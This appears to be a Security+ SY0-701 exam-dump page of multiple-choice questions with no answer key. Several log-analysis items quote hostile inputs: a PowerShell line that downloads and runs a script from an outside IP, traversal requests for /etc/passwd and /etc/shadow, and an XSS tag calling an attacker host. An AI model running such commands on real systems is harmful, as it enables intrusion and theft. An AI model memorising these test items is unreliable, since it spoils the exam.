Summer Sale - Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70dumps

SY0-701 Questions and Answers

Question # 6

Which of the following describes the difference between encryption and hashing?

A.

Encryption protects data in transit, while hashing protects data at rest.

B.

Encryption replaces cleartext with ciphertext, while hashing calculates a checksum.

C.

Encryption ensures data integrity, while hashing ensures data confidentiality.

D.

Encryption uses a public-key exchange, while hashing uses a private key.

Full Access
Question # 7

An organization is looking to optimize its environment and reduce the number of patches necessary for operating systems. Which of the following will best help to achieve this objective?

A.

Microservices

B.

Virtualization

C.

Real-time operating system

D.

Containers

Full Access
Question # 8

A bank set up a new server that contains customers ' Pll. Which of the following should the bank use to make sure the sensitive data is not modified?

A.

Full disk encryption

B.

Network access control

C.

File integrity monitoring

D.

User behavior analytics

Full Access
Question # 9

A security administrator needs to protect the integrity of a compromised laptop. The administrator turns off the laptop for a forensic investigation. Which of the following tasks should the administrator do first before analyzing the hard drive?

A.

Metadata review

B.

Snapshot

C.

Bit-level copy

D.

Memory dump

Full Access
Question # 10

An administrator needs to perform server hardening before deployment. Which of the following steps should the administrator take? (Select two).

A.

Disable default accounts.

B.

Add the server to the asset inventory.

C.

Remove unnecessary services.

D.

Document default passwords.

E.

Send server logs to the SIEM.

F.

Join the server to the corporate domain.

Full Access
Question # 11

Which of the following security controls are a company implementing by deploying HIPS? (Select two).

A.

Directive

B.

Preventive

C.

Physical

D.

Corrective

E.

Compensating

F.

Detective

Full Access
Question # 12

A technician is opening ports on a firewall for a new system being deployed and supported by a SaaS provider. Which of the following is a risk in the new system?

A.

Default credentials

B.

Non-segmented network

C.

Supply chain vendor

D.

Vulnerable software

Full Access
Question # 13

Which of the following enables the use of an input field to run commands that can view or manipulate data?

A.

Cross-site scripting

B.

Side loading

C.

Buffer overflow

D.

SQL injection

Full Access
Question # 14

Which of the following best describes the practice of preserving and documenting the handling of forensic evidence?

A.

Acquisition of evidence

B.

E-discovery

C.

Chain of custody

D.

Forensic tabletop exercises

Full Access
Question # 15

Which of the following cryptographic methods is preferred for securing communications with limited computing resources?

A.

Hashing algorithm

B.

Public key infrastructure

C.

Symmetric encryption

D.

Elliptic curve cryptography

Full Access
Question # 16

A security administrator is reissuing a former employee ' s laptop. Which of the following is the best combination of data handling activities for the administrator to perform? (Select two).

A.

Data retention

B.

Certification

C.

Tokenization

D.

Classification

E.

Sanitization

F.

Enumeration

Full Access
Question # 17

Which of the following describes effective change management procedures?

A.

Approving the change after a successful deployment

B.

Having a backout plan when a patch fails

C.

Using a spreadsheet for tracking changes

D.

Using an automatic change control bypass for security updates

Full Access
Question # 18

Which of the following should an organization focus on the most when making decisions about vulnerability prioritization?

A.

Exposure factor

B.

CVSS

C.

CVE

D.

Industry impact

Full Access
Question # 19

A security consultant is working with a client that wants to physically isolate its secure systems. Which of the following best describes this architecture?

A.

SDN

B.

Air gapped

C.

Containerized

D.

Highly available

Full Access
Question # 20

Which of the following would be the best way to handle a critical business application that is running on a legacy server?

A.

Segmentation

B.

Isolation

C.

Hardening

D.

Decommissioning

Full Access
Question # 21

After a recent vulnerability scan, a security engineer needs to harden the routers within the corporate network. Which of the following is the most appropriate to disable?

A.

Console access

B.

Routing protocols

C.

VLANs

D.

Web-based administration

Full Access
Question # 22

A security analyst sees the following entries in web server logs:

200.17.88.121 [05/May/2025:01:05:18 -0200] " GET /aboutus.htm " 200 3344

200.17.88.121 [05/May/2025:01:08:22 -0200] " GET /corporateOrg.htm " 200 4200

132.18.62.144 [05/May/2025:01:08:23 -0200] " GET /../../vhosts " 403 502

200.17.88.121 [05/May/2025:01:10:33 -0200] " POST /ContactUs.asp " 403 512

118.19.200.55 [05/May/2025:01:10:45 -0200] " POST/search " 200 1212 " SELECT * FROM company WHERE keyword = ' VP

105.86.13.11 [05/May/2025:01:15:45 -0200] " GET /latestContracts.htm " 404 512

Which of the following IP addresses is most likely involved in a malicious attempt?

A.

105.86.13.11

B.

118.19.200.55

C.

132.18.62.144

D.

200.17.88.121

Full Access
Question # 23

An analyst is evaluating the implementation of Zero Trust principles within the data plane. Which of the following would be most relevant for the analyst to evaluate?

A.

Secured zones

B.

Subject role

C.

Adaptive identity

D.

Threat scope reduction

Full Access
Question # 24

Which of the following control types is AUP an example of?

A.

Physical

B.

Managerial

C.

Technical

D.

Operational

Full Access
Question # 25

Which of the following must be considered when designing a high-availability network? (Choose two).

A.

Ease of recovery

B.

Ability to patch

C.

Physical isolation

D.

Responsiveness

E.

Attack surface

F.

Extensible authentication

Full Access
Question # 26

An employee clicked a malicious link in an email and downloaded malware onto the company ' s computer network. The malicious program exfiltrated thousands of customer records. Which of the following should the company implement to prevent this in the future?

A.

User awareness training

B.

Network monitoring

C.

Endpoint protection

D.

Data loss prevention

Full Access
Question # 27

During a recent log review, an analyst found evidence of successful injection attacks. Which of the following will best address this issue?

A.

Authentication

B.

Secure cookies

C.

Static code analysis

D.

Input validation

Full Access
Question # 28

An organization issued new laptops to all employees and wants to provide web filtering both in and out of the office without configuring additional access to the network. Which of the following types of web filtering should a systems administrator configure?

A.

Agent-based

B.

Centralized proxy

C.

URL scanning

D.

Content categorization

Full Access
Question # 29

Which of the following vulnerabilities is associated with installing software outside of a manufacturer’s approved software repository?

A.

Jailbreaking

B.

Memory injection

C.

Resource reuse

D.

Side loading

Full Access
Question # 30

Which of the following is the most important element when defining effective security governance?

A.

Discovering and documenting external considerations

B.

Developing procedures for employee onboarding and offboarding

C.

Assigning roles and responsibilities for owners, controllers, and custodians

D.

Defining and monitoring change management procedures

Full Access
Question # 31

Which of the following topics would most likely be included within an organization ' s SDLC?

A.

Service-level agreements

B.

Information security policy

C.

Penetration testing methodology

D.

Branch protection requirements

Full Access
Question # 32

Which of the following is a social engineering attack in which a bad actor impersonates a web URL?

A.

Pretexting

B.

Misinformation

C.

Typosquatting

D.

Watering-hole

Full Access
Question # 33

An administrator installs an SSL certificate on a new system. During testing, errors indicate that the certificate is not trusted. The administrator has verified with the issuing CA and has validated the private key. Which of the following should the administrator check for next?

A.

If the wildcard certificate is configured

B.

If the certificate signing request is valid

C.

If the root certificate is installed

D.

If the public key is configured

Full Access
Question # 34

Which of the following methods to secure credit card data is best to use when a requirement is to see only the last four numbers on a credit card?

A.

Encryption

B.

Hashing

C.

Masking

D.

Tokenization

Full Access
Question # 35

The analyst wants to move data from production to the UAT server for testing the latest release. Which of the following strategies to protect data should the analyst use?

A.

Data masking

B.

Data tokenization

C.

Data obfuscation

D.

Data encryption

Full Access
Question # 36

Which of the following most securely protects data at rest?

A.

TLS 1.2

B.

AES-256

C.

Masking

D.

Salting

Full Access
Question # 37

A few weeks after deploying additional email servers, a company begins to receive complaints that messages are going into recipients’ spam folders. Which of the following needs to be updated?

A.

CNAME

B.

SMTP

C.

DLP

D.

SPF

Full Access
Question # 38

An administrator notices that several users are logging in from suspicious IP addresses. After speaking with the users, the administrator determines that the employees were not logging in from those IP addresses and resets the affected users’ passwords. Which of the following should the administrator implement to prevent this type of attack from succeeding in the future?

A.

Multifactor authentication

B.

Permissions assignment

C.

Access management

D.

Password complexity

Full Access
Question # 39

Which of the following best explains how tokenization helps protect sensitive data?

A.

It permanently deletes sensitive information from production systems.

B.

It replaces the original data with reference values that do not hold exploitable meaning.

C.

It stores sensitive data across multiple cloud environments to prevent data loss.

D.

It conceals data by converting it into unreadable ciphertext using symmetric encryption.

Full Access
Question # 40

During a penetration test in a hypervisor, the security engineer is able to inject a malicious payload and access the host filesystem. Which of the following best describes this vulnerability?

A.

VM escape

B.

Cross-site scripting

C.

Malicious update

D.

SQL injection

Full Access
Question # 41

Which of the following explains how organizations benefit from SCAP?

A.

The configurations defined as part of established baselines allow organizations to deploy well-tested security solutions quickly and easily.

B.

The consolidated reporting layout makes it easier for technicians to communicate incident response to senior decision-makers.

C.

The common format for vulnerability scanning and reporting enables greater interoperability between security tools from different vendors.

D.

The strict compliance to international standards reduces overall cost and risk to organizations when a security breach occurs.

Full Access
Question # 42

Which of the following best describes the purpose of using deception technologies in a security strategy?

A.

To prevent malware installation through endpoint protection tools

B.

To block all external traffic before it reaches critical information systems

C.

To lure attackers to controlled environments to collect threat intelligence

D.

To detect insider threats by monitoring privileged user accounts

Full Access
Question # 43

A security team is setting up a new environment for hosting the organization ' s on-premises software application as a cloud-based service. Which of the following should the team ensure is in place in order for the organization to follow security best practices?

A.

Visualization and isolation of resources

B.

Network segmentation

C.

Data encryption

D.

Strong authentication policies

Full Access
Question # 44

An administrator learns that users are receiving large quantities of unsolicited messages. The administrator checks the content filter and sees hundreds of messages sent to multiple users. Which of the following best describes this kind of attack?

A.

Watering hole

B.

Typosquatting

C.

Business email compromise

D.

Phishing

Full Access
Question # 45

Staff members at a company historically click on dangerous links. The leadership team wants to reduce that risk. Which of the following should a security engineer do to help reduce future incidents?

A.

Create and run a realistic email test and provide a refresher.

B.

Leverage plaintext emails to remove clickable links.

C.

Block all unsigned email attachments for all employees.

D.

Perform header analysis for sender reputation.

Full Access
Question # 46

Which of the following best describes why me SMS DIP authentication method is more risky to implement than the TOTP method?

A.

The SMS OTP method requires an end user to have an active mobile telephone service and SIM card.

B.

Generally. SMS OTP codes are valid for up to 15 minutes while the TOTP time frame is 30 to 60 seconds

C.

The SMS OTP is more likely to be intercepted and lead to unauthorized disclosure of the code than the TOTP method.

D.

The algorithm used to generate on SMS OTP code is weaker than the one used to generate a TOTP code

Full Access
Question # 47

A software developer released a new application and is distributing the application files through the developer’s website. Which of the following should the developer post on the website to allow users to verify the integrity of the downloaded files?

A.

Hashes

B.

Certificates

C.

Algorithms

D.

Salting

Full Access
Question # 48

Which of the following agreements defines response time, escalation points, and performance metrics?

A.

BPA

B.

MOA

C.

NDA

D.

SLA

Full Access
Question # 49

A security administrator protects passwords by using hashing. Which of the following best describes what the administrator is doing?

A.

Adding extra characters at the end to increase password length

B.

Generating a token to make the passwords temporal

C.

Using mathematical algorithms to make passwords unique

D.

Creating a rainbow table to protect passwords in a list

Full Access
Question # 50

Which of the following would be the best way to test resiliency in the event of a primary power failure?

A.

Parallel processing

B.

Tabletop exercise

C.

Simulation testing

D.

Production failover

Full Access
Question # 51

A company needs to provide administrative access to internal resources while minimizing the traffic allowed through the security boundary. Which of the following methods is most secure?

A.

Implementing a bastion host

B.

Deploying a perimeter network

C.

Installing a WAF

D.

Utilizing single sign-on

Full Access
Question # 52

A company has a website in a server cluster. One server is experiencing very high usage, while others are nearly unused. Which of the following should the company configure to help distribute traffic quickly?

A.

Server multiprocessing

B.

Warm site

C.

Load balancer

D.

Proxy server

Full Access
Question # 53

A software development manager wants to ensure the authenticity of the code created by the company. Which of the following options is the most appropriate?

A.

Testing input validation on the user input fields

B.

Performing code signing on company-developed software

C.

Performing static code analysis on the software

D.

Ensuring secure cookies are use

Full Access
Question # 54

A company is in the process of cutting jobs to manage costs. The Chief Information Security Officer is concerned about the increased risk of an insider threat. Which of the following would most likely help the security awareness team address this potential threat?

A.

Immediately disable the accounts of staff who are likely to be terminated.

B.

Train supervisors to identify and manage disgruntled employees.

C.

Configure DLP to monitor staff who will be terminated.

D.

Raise awareness for business leaders on social engineering techniques.

Full Access
Question # 55

Which of the following technologies must be used in an organization that intends to automate infrastructure deployment?

A.

IaC

B.

IaaS

C.

IoC

D.

IoT

Full Access
Question # 56

An engineer has ensured that the switches are using the latest OS, the servers have the latest patches, and the endpoints ' definitions are up to date. Which of the following will these actions most effectively prevent?

A.

Zero-day attacks

B.

Insider threats

C.

End-of-life support

D.

Known exploits

Full Access
Question # 57

Which of the following is the best way to remove personal data from a social media account that is no longer being used?

A.

Exercise the right to be forgotten

B.

Uninstall the social media application

C.

Perform a factory reset

D.

Terminate the social media account

Full Access
Question # 58

During a routine audit, an analyst discovers that a department at a high school uses a simul-ation program that was not properly vetted before deployment.

Which of the following threats is this an example of?

A.

Espionage

B.

Data exfiltration

C.

Shadow IT

D.

Zero-day

Full Access
Question # 59

A malicious update was distributed to a common software platform and disabled services at many organizations. Which of the following best describes this type of vulnerability?

A.

DDoS attack

B.

Rogue employee

C.

Insider threat

D.

Supply chain

Full Access
Question # 60

An alert references attacks associated with a zero-day exploit. An analyst places a bastion host in the network to reduce the risk. Which type of control is being implemented?

A.

Compensating

B.

Detective

C.

Operational

D.

Physical

Full Access
Question # 61

An attacker floods an organization ' s VoIP phone system with thousands of requests. This causes legitimate calls to drop or fail to connect. Analysis shows the attacker faked internal extensions to trick users into answering calls and sharing sensitive information. Which of the following types of attacks has the attacker used in this incident? (Select two).

A.

SIP spoofing attack

B.

On-path attack

C.

Packet sniffing attack

D.

Vishing attack

E.

Denial-of-service attack

F.

Supply chain attack

Full Access
Question # 62

An organization recently started hosting a new service that customers access through a web portal. A security engineer needs to add to the existing security devices a new solution to protect this new service. Which of the following is the engineer most likely to deploy?

A.

Layer 4 firewall

B.

NGFW

C.

WAF

D.

UTM

Full Access
Question # 63

A company is implementing a policy to allow employees to use their personal equipment for work. However, the company wants to ensure that only company-approved applications can be installed. Which of the following addresses this concern?

A.

MDM

B.

Containerization

C.

DLP

D.

FIM

Full Access
Question # 64

Which of the following can be used to mitigate attacks from high-risk regions?

A.

Obfuscation

B.

Data sovereignty

C.

IP geolocation

D.

Encryption

Full Access
Question # 65

A security analyst collects IOCs from a cybersecurity bulletin. Which of the following should the analyst do next to assess if an environment is compromised?

A.

Root cause analysis

B.

Threat hunting

C.

Tabletop exercise

D.

Penetration test

Full Access
Question # 66

Which of the following is a key reason to follow data retention policies during asset decommissioning?

A.

To ensure data is securely destroyed when no longer needed

B.

To make backup copies of all company data before disposing of hardware

C.

To allow employees to access old files even after the hardware is recycled

D.

To keep all customer data available in case it is required in the future

Full Access
Question # 67

A systems administrator works for a local hospital and needs to ensure patient data is protected and secure. Which of the following data classifications should be used to secure patient data?

A.

Private

B.

Critical

C.

Sensitive

D.

Public

Full Access
Question # 68

A company decided to reduce the cost of its annual cyber insurance policy by removing the coverage for ransomware attacks. Which of the following analysis elements did the company most likely use in making this decision?

A.

MTTR

B.

RTO

C.

ARO

D.

MTBF

Full Access
Question # 69

Which of the following is the most likely reason a security analyst would review SIEM logs?

A.

To check for recent password reset attempts

B.

To monitor for potential DDoS attacks

C.

To assess the scope of a privacy breach

D.

To see correlations across multiple hosts

Full Access
Question # 70

An MSSP manages firewalls for hundreds of clients. Which of the following tools would be most helpful to create a standard configuration template in order to improve the efficiency of firewall changes?

A.

SNMP

B.

Benchmarks

C.

Netflow

D.

SCAP

Full Access
Question # 71

A certificate authority needs to post information about expired certificates. Which of the following would accomplish this task?

A.

TPM

B.

CRL

C.

PKI

D.

CSR

Full Access
Question # 72

A security analyst reviews the following endpoint log:

powershell -exec bypass -Command " IEX (New-Object Net.WebClient).DownloadString(http://176.30.40.50/evil.ps1 " )

Which of the following logs will help confirm an established connection to IP address 176.30.40.50?

A.

System event logs

B.

EDR logs

C.

Firewall logs

D.

Application logs

Full Access
Question # 73

Which of the following is the best reason to complete an audit in a banking environment?

A.

Regulatory requirement

B.

Organizational change

C.

Self-assessment requirement

D.

Service-level requirement

Full Access
Question # 74

A business provides long-term cold storage services to banks that are required to follow regulator-imposed data retention guidelines. Banks that use these services require that data is disposed of in a specific manner at the conclusion of the regulatory threshold for data retention. Which of the following aspects of data management is the most important to the bank in the destruction of this data?

A.

Encryption

B.

Classification

C.

Certification

D.

Procurement

Full Access
Question # 75

Which of the following vulnerabilities is exploited when an attacker overwrites a register with a malicious address?

A.

VM escape

B.

SQL injection

C.

Buffer overflow

D.

Race condition

Full Access
Question # 76

A manufacturing organization receives the results from a penetration test. According to the results, legacy devices that are critical to continued business function display vulnerabilities. The devices have minimal vendor support and should be segmented and monitored closely. Which of the following devices were most likely identified?

A.

Workstations

B.

Embedded systems

C.

Core router

D.

DNS server

Full Access
Question # 77

Which of the following activities is included in the post-incident review phase?

A.

Determining the root cause of the incident

B.

Developing steps to mitigate the risks of the incident

C.

Validating the accuracy of the evidence collected during the investigation

D.

Reestablishing the compromised system ' s configuration and settings

Full Access
Question # 78

Which of the following would best prepare a security team for a specific incident response scenario?

A.

Situational awareness

B.

Risk assessment

C.

Root cause analysis

D.

Tabletop exercise

Full Access
Question # 79

A site reliability engineer is designing a recovery strategy that requires quick failover to an identical site if the primary facility goes down. Which of the following types of sites should the engineer consider?

A.

Recovery site

B.

Hot site

C.

Cold site

D.

Warm site

Full Access
Question # 80

An organization has too many variations of a single operating system and needs to standardize the arrangement prior to pushing the system image to users. Which of the following should the organization implement first?

A.

Standard naming convention

B.

Mashing

C.

Network diagrams

D.

Baseline configuration

Full Access
Question # 81

An accounting clerk sent money to an attacker ' s bank account after receiving fraudulent instructions over the phone to use a new account. Which of the following would most likely prevent this activity in the future?

A.

Standardizing security incident reporting

B.

Executing regular phishing campaigns

C.

Implementing insider threat detection measures

D.

Updating processes for sending wire transfers

Full Access
Question # 82

Which of the following threat actors would most likely deface the website of a high-profile music group?

A.

Unskilled attacker

B.

Organized crime

C.

Nation-state

D.

Insider threat

Full Access
Question # 83

An enterprise security team is researching a new security architecture to better protect the company ' s networks and applications against the latest cyberthreats. The company has a fully remote workforce. The solution should be highly redundant and enable users to connect to a VPN with an integrated, software-based firewall. Which of the following solutions meets these requirements?

A.

IPS

B.

SIEM

C.

SASE

D.

CASB

Full Access
Question # 84

Which of the following activities should be included as part of passive reconnaissance in a penetration test?

A.

Domain Name System (DNS) zone transfer

B.

Vulnerability scanning

C.

Social engineering

D.

Google hacking

Full Access
Question # 85

A security professional discovers a folder containing an employee ' s personal information on the enterprise ' s shared drive. Which of the following best describes the data type the securityprofessional should use to identify organizational policies and standards concerning the storage of employees ' personal information?

A.

Legal

B.

Financial

C.

Privacy

D.

Intellectual property

Full Access
Question # 86

Which of the following architecture models ensures that critical systems are physically isolated from the network to prevent access from users with remote access privileges?

A.

Segmentation

B.

Virtualized

C.

Air-gapped

D.

Serverless

Full Access
Question # 87

The security operations center is researching an event concerning a suspicious IP address A security analyst looks at the following event logs and discovers that a significant portion of the user accounts have experienced faded log-In attempts when authenticating from the same IP address:

Question # 87

Which of the following most likely describes attack that took place?

A.

Spraying

B.

Brute-force

C.

Dictionary

D.

Rainbow table

Full Access
Question # 88

At the start of a penetration test, the tester checks OSINT resources for information about the client environment. Which of the following types of reconnaissance is the tester performing?

A.

Active

B.

Passive

C.

Offensive

D.

Defensive

Full Access
Question # 89

A security analyst is monitoring logs from the organization ' s SIEM and identifies logs related to one of their salespeople:

Time | IP address | Location | EmpID | App | Status

14:02 | 72.45.38.27 | Atlanta | 25687 | VPN | Success

14:04 | 72.45.38.27 | Atlanta | 25687 | Email | Failure

14:07 | 58.67.47.48 | Beijing | 25687 | VPN | Success

14:15 | 72.45.38.27 | Atlanta | 25687 | Teams | Success

Which of the following is being displayed in the logs?

A.

Impossible travel

B.

SMTP replay

C.

Directory traversal

D.

Cross-site request forgery

Full Access
Question # 90

A security team identifies a vulnerability in an application that the developers will not be able to patch for six months. Which of the following should the security team use to document this vulnerability?

A.

Risk register

B.

Patching schedule

C.

Vulnerability matrix

D.

Change management procedure

Full Access
Question # 91

A company has begun labeling all laptops with asset inventory stickers and associating them with employee IDs. Which of the following security benefits do these actions provide? (Choose two.)

A.

If a security incident occurs on the device, the correct employee can be notified.

B.

The security team will be able to send user awareness training to the appropriate device.

C.

Users can be mapped to their devices when configuring software MFA tokens.

D.

User-based firewall policies can be correctly targeted to the appropriate laptops.

E.

When conducting penetration testing, the security team will be able to target the desired laptops.

F.

Company data can be accounted for when the employee leaves the organization.

Full Access
Question # 92

A group of developers has a shared backup account to access the source code repository. Which of the following is the best way to secure the backup account if there is an SSO failure?

A.

RAS

B.

EAP

C.

SAML

D.

PAM

Full Access
Question # 93

Which of the following describes the procedures a penetration tester must follow while conducting a test?

A.

Rules of engagement

B.

Rules of acceptance

C.

Rules of understanding

D.

Rules of execution

Full Access
Question # 94

A network manager wants to protect the company ' s VPN by implementing multifactor authentication that uses:

. Something you know

. Something you have

. Something you are

Which of the following would accomplish the manager ' s goal?

A.

Domain name, PKI, GeolP lookup

B.

VPN IP address, company ID, facial structure

C.

Password, authentication token, thumbprint

D.

Company URL, TLS certificate, home address

Full Access
Question # 95

A systems administrator is working on a solution with the following requirements:

Provide a secure zone.

Enforce a company-wide access control policy.

Reduce the scope of threats.

Which of the following is the systems administrator setting up?

A.

Zero Trust

B.

AAA

C.

Non-repudiation

D.

CIA

Full Access
Question # 96

Which of the following agreement types defines the time frame in which a vendor needs to respond?

A.

SOW

B.

SLA

C.

MOA

D.

MOU

Full Access
Question # 97

A customer of a large company receives a phone call from someone claiming to work for the company and asking for the customer ' s credit card information. The customer sees the caller ID is the same as the company ' s main phone number. Which of the following attacks is the customer most likely a target of?

A.

Phishing

B.

Whaling

C.

Smishing

D.

Vishing

Full Access
Question # 98

Which of the following best explains a concern with OS-based vulnerabilities?

A.

An exploit will give an attacker access to system functions that span multiple applications.

B.

The OS vendor ' s patch cycle is not frequent enough to mitigate the large number of threats.

C.

Most users trust the core operating system features and may not notice if the system has been compromised.

D.

Exploitation of an operating system vulnerability is typically easier than any other vulnerability.

Full Access
Question # 99

Which of the following teams combines both offensive and defensive testing techniques to protect an organization ' s critical systems?

A.

Red

B.

Blue

C.

Purple

D.

Yellow

Full Access
Question # 100

Which of the following is a feature of a next-generation SIEM system?

A.

Virus signatures

B.

Automated response actions

C.

Security agent deployment

D.

Vulnerability scanning

Full Access
Question # 101

Which of the following should a company use to provide proof of external network security testing?

A.

Business impact analysis

B.

Supply chain analysis

C.

Vulnerability assessment

D.

Third-party attestation

Full Access
Question # 102

During a risk treatment exercise, an administrator discovers a risk that cannot be mitigated. Which of the following best describes this situation?

A.

Residual risk

B.

Risk appetite

C.

Reviewed risk

D.

Risk register

Full Access
Question # 103

The security operations center is researching an event concerning a suspicious IP address A security analyst looks at the following event logs and discovers that a significant portion of the user accounts have experienced faded log-In attempts when authenticating from the same IP address:

Question # 103

Which of the following most likely describes attack that took place?

A.

Spraying

B.

Brute-force

C.

Dictionary

D.

Rainbow table

Full Access
Question # 104

Which of the following can be used to compromise a system that is running an RTOS?

A.

Cross-site scripting

B.

Memory injection

C.

Replay attack

D.

Ransomware

Full Access
Question # 105

A company ' s accounts payable clerk receives a message from a vendor asking to change their bank account before paying an invoice. The clerk makes the change and sends the payment to the new account. Days later, the clerk receives another message from the same vendor with a request for a missing payment to the original bank account. Which of the following has most likely occurred?

A.

Phishing campaign

B.

Data exfiltration

C.

Pretext calling

D.

Business email compromise

Full Access
Question # 106

A security analyst receives an alert from a web server that contains the following logs:

GET /image?filename=../../../etc/passwd

Host: AcmeInc.web.net

useragent: python-request/2.27.1

GET /image?filename=../../../etc/shadow

Host: AcmeInc.web.net

useragent: python-request/2.27.1

Which of the following attacks is being attempted?

A.

File injection

B.

Privilege escalation

C.

Directory traversal

D.

Cookie forgery

Full Access
Question # 107

A visitor plugs a laptop into a network jack in the lobby and is able to connect to the company ' s network. Which of the following should be configured on the existing network infrastructure to best prevent this activity?

A.

Port security

B.

Web application firewall

C.

Transport layer security

D.

Virtual private network

Full Access
Question # 108

A security analyst is reviewing logs and discovers the following:

Question # 108

Which of the following should be used lo best mitigate this type of attack?

A.

Input sanitization

B.

Secure cookies

C.

Static code analysis

D.

Sandboxing

Full Access
Question # 109

A company is concerned about weather events causing damage to the server room and downtime. Which of the following should the company consider?

A.

Clustering servers

B.

Geographic dispersion

C.

Load balancers

D.

Off-site backups

Full Access
Question # 110

While a user reviews their email, a host gets infected by malware from an external hard drive plugged into the host. The malware steals all the user ' s credentials stored in the browser. Which of the following training topics should the user review to prevent this situation from reoccurring?

A.

Operational security

B.

Removable media and cables

C.

Password management

D.

Social engineering

Full Access
Question # 111

The Cruel Information Security Officer (CISO) asks a security analyst to install an OS update to a production VM that has a 99% uptime SLA. The CISO tells me analyst the installation must be done as quickly as possible. Which of the following courses of action should the security analyst take first?

A.

Log in to the server and perform a health check on the VM.

B.

Install the patch Immediately.

C.

Confirm that the backup service is running.

D.

Take a snapshot of the VM.

Full Access
Question # 112

Which of the following vulnerabilities will lead to a successful attack that injects < IMG src= ' http://attackersite.net/mycode.sh ' > into a web application?

A.

Directory traversal

B.

Buffer overflow

C.

SQLi

D.

XSS

Full Access
Question # 113

Which of the following are the best methods for hardening end user devices? (Select two)

A.

Full disk encryption

B.

Group-level permissions

C.

Account lockout

D.

Endpoint protection

E.

Proxy server

F.

Segmentation

Full Access
Question # 114

A legacy device is being decommissioned and is no longer receiving updates or patches. Which of the following describes this scenario?

A.

End of business

B.

End of testing

C.

End of support

D.

End of life

Full Access
Question # 115

A company performs risk analysis on its equipment and estimates it will experience about ten incidents over a five-year period. Which of the following is the correct ARO for the equipment?

A.

2

B.

5

C.

10

D.

50

Full Access
Question # 116

A legal department must maintain a backup from all devices that have been shredded and recycled by a third party. Which of the following best describes this requirement?

A.

Data retention

B.

Certification

C.

Sanitation

D.

Destruction

Full Access
Question # 117

Several customers want an organization to verify its security controls are operating effectively and have requested an independent opinion. Which of the following is the most efficient way to address these requests?

A.

Hire a vendor to perform a penetration test.

B.

Perform an annual self-assessment.

C.

Allow each client the right to audit.

D.

Provide a third-party attestation report.

Full Access
Question # 118

Which of the following would a security administrator use to comply with a secure baseline during a patch update?

A.

Information security policy

B.

Service-level expectations

C.

Standard operating procedure

D.

Test result report

Full Access
Question # 119

A security engineer is installing an IPS to block signature-based attacks in the environment. Which of the following modes will best accomplish this task?

A.

Monitor

B.

Sensor

C.

Audit

D.

Active

Full Access
Question # 120

An engineer needs to ensure that a script has not been modified before it is launched. Which of the following best provides this functionality?

A.

Masking

B.

Obfuscation

C.

Hashing

D.

Encryption

Full Access
Question # 121

Which of the following should a security team do first before a new web server goes live?

A.

Harden the virtual host.

B.

Create WAF rules.

C.

Enable network intrusion detection.

D.

Apply patch management

Full Access
Question # 122

Which of the following is the primary purpose of a service that tracks log-ins and time spent using the service?

A.

Availability

B.

Accounting

C.

Authentication

D.

Authorization

Full Access
Question # 123

A security analyst reviews web server logs and sees the following entries:

16.22.48.102 -- 26/April/2023 22:00:04.33 GET " http://www.databaseInfo.com/index.html/* " 200

16.22.48.102 -- 26/April/2023 22:00:07.23 GET " http://www.databaseInfo.com/index.html/../ " 404

16.22.48.102 -- 26/April/2023 22:01:16.03 GET " http://www.databaseInfo.com/index.html/../images " 404

16.22.48.102 -- 26/April/2023 22:03:10.25 GET " http://www.databaseInfo.com/index.html/../passwords " 404

16.22.48.102 -- 26/April/2023 22:05:11.22 GET " http://www.databaseInfo.com/index.html/../storedSQLqueries " 404

Which of the following attacks is most likely being attempted?

A.

Denial of service

B.

Password spraying

C.

SQL injection

D.

Directory traversal

Full Access
Question # 124

After multiple phishing simul-ations, the Chief Security Officer announces a new program that incentivizes employees to not click phishing links in the upcoming quarter. Which of the following security awareness execution techniques does this represent?

A.

Computer-based training

B.

Insider threat awareness

C.

SOAR playbook

D.

Gamification

Full Access
Question # 125

A company is developing a business continuity strategy and needs to determine how many staff members would be required to sustain the business in the case of a disruption. Which of the following best describes this step?

A.

Capacity planning

B.

Redundancy

C.

Geographic dispersion

D.

Tablet exercise

Full Access
Question # 126

A systems administrator receives the following alert from a file integrity monitoring tool:

The hash of the cmd.exe file has changed.

The systems administrator checks the OS logs and notices that no patches were applied in the last two months. Which of the following most likely occurred?

A.

The end user changed the file permissions.

B.

A cryptographic collision was detected.

C.

A snapshot of the file system was taken.

D.

A rootkit was deployed.

Full Access
Question # 127

A user sends an email that includes a digital signature for validation. Which of the following security concepts would ensure that a user cannot deny that they sent the email?

A.

Non-repudiation

B.

Confidentiality

C.

Integrity

D.

Authentication

Full Access
Question # 128

Company A jointly develops a product with Company B, which is located in a different country. Company A finds out that their intellectual property is being shared with unauthorized companies. Which of the following has been breached?

A.

SLA

B.

AUP

C.

SOW

D.

MOA

Full Access
Question # 129

An accounting employee recently used software that was not approved by the company. Which of the following risks does this most likely represent?

A.

Unskilled attacker

B.

Hacktivist

C.

Shadow IT

D.

Supply chain

Full Access
Question # 130

Which of the following is a reason environmental variables are a concern when reviewing potential system vulnerabilities?

A.

The contents of environmental variables could affect the scope and impact of an exploited vulnerability.

B.

In-memory environmental variable values can be overwritten and used by attackers to insert malicious code.

C.

Environmental variables define cryptographic standards for the system and could create vulnerabilities if deprecated algorithms are used.

D.

Environmental variables will determine when updates are run and could mitigate the likelihood of vulnerability exploitation.

Full Access
Question # 131

During a recent log review, an analyst discovers evidence of successful injection attacks. Which of the following will best address this issue?

A.

Authentication

B.

Secure cookies

C.

Static code analysis

D.

Input validation

Full Access
Question # 132

An organization wants to limit potential impact to its log-in database in the event of a breach. Which of the following options is the security team most likely to recommend?

A.

Tokenization

B.

Hashing

C.

Obfuscation

D.

Segmentation

Full Access
Question # 133

The security team notices that the Always On VPN solution sometimes fails to connect. This leaves remote users unprotected because they cannot connect to the on-premises web proxy. Which of the following changes will best provide web protection in this scenario?

A.

Implement network access control.

B.

Configure the local gateway to point to the VPN.

C.

Create a public NAT to the on-premises proxy.

D.

Install a host-based content filtering solution.

Full Access
Question # 134

Which of the following types of vulnerabilities is primarily caused by improper use and management of cryptographic certificates?

A.

Misconfiguration

B.

Resource reuse

C.

Insecure key storage

D.

Weak cipher suites

Full Access
Question # 135

Which of the following would most likely be deployed to obtain and analyze attacker activity and techniques?

A.

Firewall

B.

IDS

C.

Honeypot

D.

Layer 3 switch

Full Access
Question # 136

A company receives an alert that a network device vendor, which is widely used in the enterprise, has been banned by the government.

Which of the following will the company ' s general counsel most likely be concerned with during a hardware refresh of these devices?

A.

Sanctions

B.

Data sovereignty

C.

Cost of replacement

D.

Loss of license

Full Access
Question # 137

